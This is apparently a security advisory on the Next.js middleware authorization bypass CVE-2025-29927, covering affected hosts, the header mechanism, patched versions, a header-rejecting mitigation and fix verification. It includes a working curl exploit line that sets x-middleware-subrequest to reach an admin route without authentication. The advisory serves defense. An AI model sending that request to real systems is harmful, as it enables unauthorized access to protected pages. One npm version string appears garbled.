Next.js Middleware Authorization Bypass (CVE-2025-29927)

Hosting environment impact

The blast radius depends on how middleware is executed. Each hosting environment has to be checked separately.

• Vercel Edge Middleware: Affected. Vercel applied a platform-level mitigation, but if your Next.js version itself is unpatched, you remain exposed.
• Netlify: Affected. Netlify Edge Functions running Next.js middleware can be bypassed in the same way.
• Cloudflare Pages (next-on-pages): Verify separately. The behavior depends on the adapter’s middleware implementation; check both the adapter and Next.js patch level.
• Self-hosted Node.js: If you run next start and rely on middleware, you are affected.

Vulnerability mechanism

The Next.js middleware runtime uses an x-middleware-subrequest header to identify internal subrequests (such as continuations from rewrites or redirects). The header was supposed to be internal-only and never reach the runtime from outside the platform, but in reality external requests could still set it.

The bug is that Next.js had a code path that skipped middleware execution when this header was present. As a result, an attacker could reach a protected handler without triggering the auth/authorization middleware:

curl -H "x-middleware-subrequest: middleware:middleware:middleware" \
     https://target.example.com/admin

CVSS 9.1 (Critical) reflects: (1) auth bypass with immediate impact, (2) no preconditions — any anonymous user can attempt it, and (3) a wide blast radius across Next.js projects that use middleware as an authentication gate.

Patch examples

1. Upgrade to a patched version (recommended)

# Upgrade to the patched version for your major
npm install [email protected]
# Or the latest stable
npm install next@latest

Minimum safe versions per major:

• Next.js 12: 12.3.5
• Next.js 13: 13.5.9
• Next.js 14: 14.2.25
• Next.js 15: 15.2.3

2. Temporary mitigation (before patching)

If you cannot upgrade right away, reject the x-middleware-subrequest header at the entry of your middleware so that no externally-sent value can short-circuit auth:

// middleware.ts
import { NextRequest, NextResponse } from 'next/server'

export function middleware(request: NextRequest) {
  if (request.headers.get('x-middleware-subrequest')) {
    return new NextResponse(null, { status: 400 })
  }
  // Existing auth / authorization logic
}

You can also block this header at your reverse proxy or WAF (Cloudflare WAF, Nginx, AWS WAF) for an immediate platform-wide fix while you roll out the upgrade.

3. Verifying the fix

After upgrading, repeat the curl request above. If the response is 401/403 or a redirect to login, your auth gate is back in place and the patch is effective.

Summary

This vulnerability bypasses Next.js middleware authentication directly and is a critical-severity authorization issue. Any project that relies on middleware as an authentication gate should upgrade to the patched version immediately. If an immediate upgrade is not possible, apply the temporary mitigation in middleware or at the WAF layer first, then roll out the upgrade in a controlled fashion.